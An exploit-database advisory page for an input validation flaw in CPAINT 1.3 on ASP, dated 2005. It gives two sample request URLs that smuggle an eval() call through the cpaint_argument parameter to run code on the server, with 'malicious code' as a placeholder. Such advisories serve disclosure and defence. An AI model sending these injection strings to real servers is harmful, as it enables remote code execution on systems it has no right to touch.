[] NeoSense
E X P L O I T S
title author type platform port cve id

CPaint 1.3 - xmlhttp Request Input Validation

Author: Thor Larholm
type: webapps
platform: asp
port: 
date_added: 2005-08-16 
date_updated: 2013-06-13 
verified: 1 
codes:  
tags: 
aliases:  
screenshot_url:  
application_url: 
source: https://www.securityfocus.com/bid/14577/info

CPAINT is prone to an input validation vulnerability. This issue occurs because the application fails to properly sanitize malicious scripts and requests from user-supplied input.

Successful exploitation of this vulnerability could lead to a compromise of the server running the affected application. Other attacks are also possible.

calculator.asp?cpaint_function=addNumbers&cpaint_argument[]=1&cpaint_argument[]=2")%20%26%20eval("malicious code

http://someserver.com/cpaintfile.asp?cpaint_function=response.write&cpaint_argument[]=2")%20%26%20eval("malicious code
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.